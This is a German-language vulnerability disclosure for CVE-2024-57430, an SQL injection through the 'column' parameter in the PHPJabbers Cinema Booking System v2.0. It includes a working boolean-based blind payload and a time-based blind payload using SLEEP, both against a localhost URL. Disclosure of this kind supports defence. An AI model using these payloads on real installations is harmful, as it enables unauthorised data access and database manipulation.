
CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 ist anfällig für SQL-Injection, was zu unbefugtem Datenzugriff und Privilegieneskalation führt.
Eine SQL-Injection-Schwachstelle in der Funktion pjActionGetUser des PHPJabbers Cinema Booking System v2.0 ermöglicht es Angreifern, Datenbankabfragen über den Parameter column zu manipulieren. Die Ausnutzung dieses Fehlers kann zu unbefugter Offenlegung von Informationen, Rechteausweitung oder Datenbankmanipulation führen.
Verwundbarer Parameter: column
SQL-Injection kann zu unbefugtem Zugriff auf vertrauliche Informationen, zur Veränderung der Datenbank und sogar zur vollständigen Übernahme des Datenbankservers führen. Dies stellt eine kritische Bedrohung für Vertraulichkeit, Integrität und Verfügbarkeit der Anwendung dar.
GET-Anfrage an die URL: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10